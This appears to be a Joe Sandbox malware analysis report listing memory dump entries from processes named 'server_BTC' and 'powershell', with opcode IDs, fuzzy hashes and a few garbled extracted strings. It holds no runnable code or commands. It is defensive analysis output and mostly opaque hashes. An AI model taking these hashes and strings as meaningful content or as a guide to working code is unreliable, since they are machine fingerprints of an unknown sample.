                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 05da6f2f2c18b8fcfcf5956761a7ffaf2f478ad4e0d1fada7976b51fabb95716
                                                                                                                                • Instruction ID: be62a1c0eeeecbdf7414c5969ffaddbb6b884a88fc28468cff18900996a1fc90
                                                                                                                                • Opcode Fuzzy Hash: 05da6f2f2c18b8fcfcf5956761a7ffaf2f478ad4e0d1fada7976b51fabb95716
                                                                                                                                • Instruction Fuzzy Hash: 45218C72C242568FD704EFB8D8593ED7BB0EB06305F0448AAD41163295DB785685CB85
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1e5c6043a45ddf5f502f28476480a8d05198c2f7124227839c1bb0104120c1e7
                                                                                                                                • Instruction ID: c3e0e05c810e9b76a6e1cdc4f35d717427847d45d15e16d2d849b4bb6923d9dd
                                                                                                                                • Opcode Fuzzy Hash: 1e5c6043a45ddf5f502f28476480a8d05198c2f7124227839c1bb0104120c1e7
                                                                                                                                • Instruction Fuzzy Hash: D811263A314241DFD706AF7CD56559A7FB6EF46304B0104A9D145CB3A6DE34CC19C782
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0f3be586ac72cba5f3bf43654013d8a0f49890ae0cac3f430bd1d9c8a4fdea4b
                                                                                                                                • Instruction ID: 724b064977f13a1c1326db11ca2184d0885b598134358af5130c32566fd840e1
                                                                                                                                • Opcode Fuzzy Hash: 0f3be586ac72cba5f3bf43654013d8a0f49890ae0cac3f430bd1d9c8a4fdea4b
                                                                                                                                • Instruction Fuzzy Hash: 7C018F7A710211DFD709AF6CE555A9E7BAAFF85258B004028D50ACB368EF31DC149BD2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8bcfed31984f91e37bd365c22f9b92d74061d0d4903bdbc2985d37426f0f4f4c
                                                                                                                                • Instruction ID: 05a3569df068beef384fb14b2ebb1ff5d34eec9a14c4758b7519b84c165d6817
                                                                                                                                • Opcode Fuzzy Hash: 8bcfed31984f91e37bd365c22f9b92d74061d0d4903bdbc2985d37426f0f4f4c
                                                                                                                                • Instruction Fuzzy Hash: 87015A71C2021ADFDB04EFB8D41D7AEBFF0EB46301F0498A99526A3294DB780684CF91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b88e5563f4eba36f2dd3f4ff838374cfb5da9daaae3aa40c619f87721bce041e
                                                                                                                                • Instruction ID: 90081ca9907e0ef7111cee8b7e61a664c9ba98092152ec30d607269939d2f28f
                                                                                                                                • Opcode Fuzzy Hash: b88e5563f4eba36f2dd3f4ff838374cfb5da9daaae3aa40c619f87721bce041e
                                                                                                                                • Instruction Fuzzy Hash: 05017274B41319AFCB68DB34D850BAE7332AF86215F5094A9804D67290CE369E86CF1A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c143f8da0e1238ef8e83bb25aeca7044b7d46fa44394602690e62943fb2f2f30
                                                                                                                                • Instruction ID: d2dfed0af54f9c2dfd51f7563b8052c8bb279166e31c51329dcc4a39b1a26768
                                                                                                                                • Opcode Fuzzy Hash: c143f8da0e1238ef8e83bb25aeca7044b7d46fa44394602690e62943fb2f2f30
                                                                                                                                • Instruction Fuzzy Hash: DCF01C75D10156CFCB64DFA8E4487BCBFB0EF5A312F0464A6E50AA3250CB309985CF14
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 82abe7c801fd5a107a2d5a86cae7f04ed49749504069ac6a5711e341c7132099
                                                                                                                                • Instruction ID: 755b1f5dcb37098254c8c6c8d3299624c9a279cc74a93d19dab7aadc53bcc825
                                                                                                                                • Opcode Fuzzy Hash: 82abe7c801fd5a107a2d5a86cae7f04ed49749504069ac6a5711e341c7132099
                                                                                                                                • Instruction Fuzzy Hash: 7BF03074D20204DFC714EF78E648A687FB0FB08311F1441A9E90493365EB309D81CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3c72b7a95777cb201eed375ee4a85fdf430efd0e96cb9c6a18a1f8b830ea534c
                                                                                                                                • Instruction ID: 1b1d83880cf2430aef2400843343c6234093552f3daec0047b1076140d66e4b4
                                                                                                                                • Opcode Fuzzy Hash: 3c72b7a95777cb201eed375ee4a85fdf430efd0e96cb9c6a18a1f8b830ea534c
                                                                                                                                • Instruction Fuzzy Hash: C2E02230921248DFCB05EFB8EA0969D7FB9EF15300F1440A9E8099324AEB312E44DB82
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2f84c5fd558f4fa10f5f9453832df3e5cc08eb6d3e29b390d2411c5c6f4611d9
                                                                                                                                • Instruction ID: 4bda26428faf49d9ded599fa1cb86149f7bd88feade0fd9f818b21ed8b2d8763
                                                                                                                                • Opcode Fuzzy Hash: 2f84c5fd558f4fa10f5f9453832df3e5cc08eb6d3e29b390d2411c5c6f4611d9
                                                                                                                                • Instruction Fuzzy Hash: DAE01AB8910218DFC744EF68E548A59BFB0FB49311F5041A9D90993365EB309D95CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 62cdebfaac2c2cdcef7f85adc7a664c78b6130491803ef0fc807947d55a1dc7a
                                                                                                                                • Instruction ID: 0bb043fe19a01b9f948c51d3b396b4678506c097e57902a128b9bda109db2260
                                                                                                                                • Opcode Fuzzy Hash: 62cdebfaac2c2cdcef7f85adc7a664c78b6130491803ef0fc807947d55a1dc7a
                                                                                                                                • Instruction Fuzzy Hash: 28E08671911109DFC704EFB8E609A5DBBB9EF04304F508568D40993259EB726E14D780
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: abd8b6239315cdf2f504340c33181f8c00ca86051192057c839a6e0d0f3d5148
                                                                                                                                • Instruction ID: a69a808c916b763fdaf4e76f367a6c46aaf46b81a4eb47c6340f7882ba67c07d
                                                                                                                                • Opcode Fuzzy Hash: abd8b6239315cdf2f504340c33181f8c00ca86051192057c839a6e0d0f3d5148
                                                                                                                                • Instruction Fuzzy Hash: 81D0A772C203469FC315DBB4F909754BF79EB02316F8842ADE51893246EBB590D0C7D6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ba4895f682cd68440c4fe197139ea215600956f5f4aba602955cb64dd6618b9a
                                                                                                                                • Instruction ID: 7dff2d7112d22968472238babf85b9413e7c65324a7f5961424d735f0e402282
                                                                                                                                • Opcode Fuzzy Hash: ba4895f682cd68440c4fe197139ea215600956f5f4aba602955cb64dd6618b9a
                                                                                                                                • Instruction Fuzzy Hash: 4AC01270811248DFD314DAB8B409A557E7CDB42216F400158A51852241DB714460C695
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 72920dd37554292450f28a2b16c09a9841ec25cab7bb9484f0b26e6e4c70c047
                                                                                                                                • Instruction ID: 206ab37d7259291d92ea9b3c6929a697153c7759dea38e89b7af573c3c54c198
                                                                                                                                • Opcode Fuzzy Hash: 72920dd37554292450f28a2b16c09a9841ec25cab7bb9484f0b26e6e4c70c047
                                                                                                                                • Instruction Fuzzy Hash: 1EC08070C21209DFC315DF98B409B59BF7CD702312F804169E61853245DB715490C7E5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: {Y2n^$Y2n^
                                                                                                                                • API String ID: 0-4268513801
                                                                                                                                • Opcode ID: d4cf972e886e499f202562bb3a473071e6913b845e9b4793642c94302dc7be86
                                                                                                                                • Instruction ID: f137bac124efaae2f2d4a640d7e2ebb63a301ed9d54cc9c85d7223d27a1dde42
                                                                                                                                • Opcode Fuzzy Hash: d4cf972e886e499f202562bb3a473071e6913b845e9b4793642c94302dc7be86
                                                                                                                                • Instruction Fuzzy Hash: C6917470F506145BDB59EFB489509AE77A3EFC4708B40C92DD24AAB340DF34AD068BD6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $a$k$$a$k$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$pioj$pioj$pioj$pioj$pioj$tP]q$tP]q$tP]q$tP]q$tP]q$tP]q$|,qj$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-618838785
                                                                                                                                • Opcode ID: 4d03224de16d1af8ec883e9816d67bb12225f86256af52069239c644d8ade6ff
                                                                                                                                • Instruction ID: 44113bd6817d5afde8fd28fec96035a4f67374ab4be2bf336930a5b798e21578
                                                                                                                                • Opcode Fuzzy Hash: 4d03224de16d1af8ec883e9816d67bb12225f86256af52069239c644d8ade6ff
                                                                                                                                • Instruction Fuzzy Hash: BBB259B1F24306CFCB259B7988207AABBE6BF85310F1484BAD546CB351DA35CC45C7A2
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4']q$4']q$4']q$4']q
                                                                                                                                • API String ID: 0-1785108022
                                                                                                                                • Opcode ID: e1b3517106f7213043095bd3aff768025739080c23ed950b66c6e4793fa83172
                                                                                                                                • Instruction ID: 46c1d0b487c96a17f2e65e4c8b1ccc7539009d21eae4494fd39321761646eb87
                                                                                                                                • Opcode Fuzzy Hash: e1b3517106f7213043095bd3aff768025739080c23ed950b66c6e4793fa83172
                                                                                                                                • Instruction Fuzzy Hash: 321247B1B143558FCB259B7998106BABFA2AFC5310F1484BAD946CF342DE35CC45CBA2
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (aq
                                                                                                                                • API String ID: 0-600464949
                                                                                                                                • Opcode ID: 8c517fc4ac92c960e61f41b6f2882958c5e763666a85e5ad3a1f5ac1d18f0a53
                                                                                                                                • Instruction ID: df341206d7830457a5ccbba7ecc2376a24504eb9e35331865861b887035000a8
                                                                                                                                • Opcode Fuzzy Hash: 8c517fc4ac92c960e61f41b6f2882958c5e763666a85e5ad3a1f5ac1d18f0a53
                                                                                                                                • Instruction Fuzzy Hash: 50412E34B442048FDB19DF68C894AAEBBF2EF8D311F244499E406EB391DB35AC01CB61
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (&]q
                                                                                                                                • API String ID: 0-1343553580
                                                                                                                                • Opcode ID: eb636103ce2206c574bccff54d0d3142f1db7634d64a6418b2c260103a709ace
                                                                                                                                • Instruction ID: fa1f09edc8e4cb4c794f90deb35fbc760a5e4711f71e4f5becb73cbc127a3465
                                                                                                                                • Opcode Fuzzy Hash: eb636103ce2206c574bccff54d0d3142f1db7634d64a6418b2c260103a709ace
                                                                                                                                • Instruction Fuzzy Hash: 3A21DE71A042588FCB14EFAED444AAEBFF5EF89320F14846ED408A7340CA74A805CBE5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: aed8317771b03419fe21c032fbe5216c10d430230433e492355ef6e0064da38f
                                                                                                                                • Instruction ID: b44caf24d398c18737d6ddae892146c8b15b03ca53febe0149c5857ab1edb686
                                                                                                                                • Opcode Fuzzy Hash: aed8317771b03419fe21c032fbe5216c10d430230433e492355ef6e0064da38f
                                                                                                                                • Instruction Fuzzy Hash: 48B157B1F142099FCB189B79D4006AABBE6AFC7311F19C07AD446CB352DA71DD41C7A2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ae18a2b49253245dbfff6903be2ded982162c2536a43228ad2c4d51f9c50ddc8
                                                                                                                                • Instruction ID: 1bda7c398ea40afd7cc1d40c5e27b117f6d1b277033ad16c5f9ae449bc450644
                                                                                                                                • Opcode Fuzzy Hash: ae18a2b49253245dbfff6903be2ded982162c2536a43228ad2c4d51f9c50ddc8
                                                                                                                                • Instruction Fuzzy Hash: 1B919B74A002099FCB15DF58C5D49BEBBB1FF88311B248699D855AB3A6C736FC81CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b4a695260531b47584e123543919a5d78ed023c8b6d499fc23e1b8048cd876ff
                                                                                                                                • Instruction ID: 2d52dd1a41c56977c7f4422ad77658c9f250a459f27e3ac613e9d60eb3b0b768
                                                                                                                                • Opcode Fuzzy Hash: b4a695260531b47584e123543919a5d78ed023c8b6d499fc23e1b8048cd876ff
                                                                                                                                • Instruction Fuzzy Hash: 8551C1353002099FD708AB69DC44A2A77EAFFC9351B2484AED506CB352EB35EC01CBA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6eeed77c6a22d5d5ed1a540b4563ab1364c353562978ed9d0a9203d2765f8d31
                                                                                                                                • Instruction ID: 01df0a2d6f88d715c071ed510246c17300934dcef2889bcb1f22aa04ce861ff0
                                                                                                                                • Opcode Fuzzy Hash: 6eeed77c6a22d5d5ed1a540b4563ab1364c353562978ed9d0a9203d2765f8d31
                                                                                                                                • Instruction Fuzzy Hash: 0A611771E002488FCB14DFA9D584A9DFBF5FF98310F14812AE819AB354EB34AC45CB64
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b39b89b28fcbcd654034de6be99934fe1d4ea10fb26ed8d1ebb2f4f4f0cdb5ef
                                                                                                                                • Instruction ID: b11e52401e3255df9b3cd03d9d77c97cbdc4629c6fc61b496e8ceb2f78492d0d
                                                                                                                                • Opcode Fuzzy Hash: b39b89b28fcbcd654034de6be99934fe1d4ea10fb26ed8d1ebb2f4f4f0cdb5ef
                                                                                                                                • Instruction Fuzzy Hash: D0511671E01248CFCB14DFA9D584A9DBFF6FF98310F14806AE819AB365EB34A845CB54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 44186794b7f7b5b3db6d5dae0ee6b65e7802da962fb76a72e24da7ff5c1fe6da
                                                                                                                                • Instruction ID: 7ffe20efab7d550a3c93c31b04ea41f088785ceddbfa75ac8218e93e7a9951e9
                                                                                                                                • Opcode Fuzzy Hash: 44186794b7f7b5b3db6d5dae0ee6b65e7802da962fb76a72e24da7ff5c1fe6da
                                                                                                                                • Instruction Fuzzy Hash: A541D4F0E24302DFCB259B3AC551666BBB2AF85710F1840A6D5028F396DB35DC85CBA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 98b5c15a5c74ff11dcbaf8d4a009dc143ef8ea80a88ac949e3da953f1cc59c79
                                                                                                                                • Instruction ID: cf99d07045044d59c427f346f894b09902edeceb8bb4787fddf7be66d2953313
                                                                                                                                • Opcode Fuzzy Hash: 98b5c15a5c74ff11dcbaf8d4a009dc143ef8ea80a88ac949e3da953f1cc59c79
                                                                                                                                • Instruction Fuzzy Hash: 51414234A442498FCB19DFA4D9949AEBFF1AF89314F24449ED446EB362DB319C41CB21
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a7901f2c7b72a123f6eba41f038783704aa1ef2b3bf1c625a9d83e329a24e270
                                                                                                                                • Instruction ID: d0076401126925c03d4b74352d58e7b24c13bf1e8b64f414dd3deab955c3d94a
                                                                                                                                • Opcode Fuzzy Hash: a7901f2c7b72a123f6eba41f038783704aa1ef2b3bf1c625a9d83e329a24e270
                                                                                                                                • Instruction Fuzzy Hash: D2415774A015099FCB09DF58C2D89BAFBB1FF48311B1186A9D815AB365C732FC91CBA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6815050edc5a48175b551137e69a42e69fe7f63c4e5173bedbf4e886fd1b07f1
                                                                                                                                • Instruction ID: dc102d05ec3945f30284a566da00eb7ea17c8adb32eb60cf1e691ef8ef98679c
                                                                                                                                • Opcode Fuzzy Hash: 6815050edc5a48175b551137e69a42e69fe7f63c4e5173bedbf4e886fd1b07f1
                                                                                                                                • Instruction Fuzzy Hash: 44318D313402019FC719EB68E884E9AB79AEFC4315F00813DE60ACB365DF74A845CBA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 76fa390530b5fcabbee5d753e253cdb85e7faf523c331be7d7068c1937a93529
                                                                                                                                • Instruction ID: 07be137f4a7452b94d32be77d8753658f0272daeddc6cc49d58d89ac95955c74
                                                                                                                                • Opcode Fuzzy Hash: 76fa390530b5fcabbee5d753e253cdb85e7faf523c331be7d7068c1937a93529
                                                                                                                                • Instruction Fuzzy Hash: 42318B70E402098FDB04EFB9D598AAEBBF2AF88314F14806EE405EB351EB749C418B55
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e34fe6fb55fabccee12b07a1d93b3972f4350cba9cf9f50e647d7339988fc4be
                                                                                                                                • Instruction ID: 7fa5fd9c04ec3883050d4ffa2fb8310a0ff7fbd9c056c9fefaf68956acf32258
                                                                                                                                • Opcode Fuzzy Hash: e34fe6fb55fabccee12b07a1d93b3972f4350cba9cf9f50e647d7339988fc4be
                                                                                                                                • Instruction Fuzzy Hash: 8131B0B4A002459FDB05EFB4D894AAE7BB2EF84300F1084ADD214AF395DA399D01CF61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 08a3d602789751634b029857c79e181d66516b91b5fdedabf02f66cec66ea184
                                                                                                                                • Instruction ID: 9545a13ee3a6c92975aed8cd6a281812900092be2efc9b676b5f9a484253e729
                                                                                                                                • Opcode Fuzzy Hash: 08a3d602789751634b029857c79e181d66516b91b5fdedabf02f66cec66ea184
                                                                                                                                • Instruction Fuzzy Hash: D5312C70E406099FDB14EFB9D5947AEBBF6EF88310F14802EE405EB354EA749C418BA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 228af381a1886435c4d947d9cb5f103d59c5573cc8a85b30335374397eb3aa92
                                                                                                                                • Instruction ID: f7a0cfc161c99811ef1b076cafc7d20c66e4fe3b9f6d3b67aea3776a14eb3e60
                                                                                                                                • Opcode Fuzzy Hash: 228af381a1886435c4d947d9cb5f103d59c5573cc8a85b30335374397eb3aa92
                                                                                                                                • Instruction Fuzzy Hash: D7311874B402048FCB14EF68E458A9DBBF2AF88354F14846ED406EB7A1DB71AC85CB95
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 500660fa8ee47de41225cbcb44994bedfaf1576cb24730d0a0499db383a89be2
                                                                                                                                • Instruction ID: ce4410c593cb0d0939f75c7f214e6ec74f3499750be32a90bf4f93c82736b38b
